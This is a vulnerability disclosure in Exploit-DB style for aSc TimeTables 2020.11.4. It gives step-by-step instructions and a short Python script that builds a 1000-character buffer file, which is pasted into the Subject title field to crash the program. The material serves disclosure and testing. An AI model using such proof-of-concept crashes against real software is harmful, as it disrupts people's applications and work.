Vendor: aSc TimeTables 2020.11.4
By: Ismael Nava
CVSS: 7.5 HIGH
Denial of Service
CWE: 400
Product Name: aSc TimeTables 2020.11.4
Affected Version From: 2020.11.4
Affected Version To: 2020.11.4
Patch Exists: YES
Related CWE: n/a
CPE: a:asctimetables:asctimetables:2020.11.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Home x64
2020

aSc TimeTables 2020.11.4 – Denial of Service (PoC)

This proof of concept causes a denial of service (DoS) in aSc Timetables 2020. A new .txt file is created containing a buffer of 1000 'Z' characters, and the content of that file is then pasted into the Subject title field of the program.

Mitigation:

The user should ensure that the program is updated to the latest version and should not open any suspicious files.

Exploit-DB raw data:

# Exploit Title: aSc TimeTables 2020.11.4 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version: 2020.11.4
# Tested on: Windows 10 Home x64
# CVE : n/a

# STEPS
# Open the program aSc Timetables 2020
# In File select the option New
# Put any letter in the field Name of the School and click Next
# In the next window click NEXT
# In the Step 3, in Subject click in New
# Run the python exploit script, it will create a new .txt file
# Copy the content of the file "Tables.txt"
# Paste the content in the field Subject title
# Click in OK
# End :)


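# Build the 1000-character buffer described in the steps above
buffer = 'Z' * 1000

try:
    # Write the buffer to Tables.txt; the with-block closes the file
    with open("Tables.txt", "w") as file:
        file.write(buffer)

    print("Archive ready")
except OSError:
    # The file could not be created or written
    print("Archive no ready")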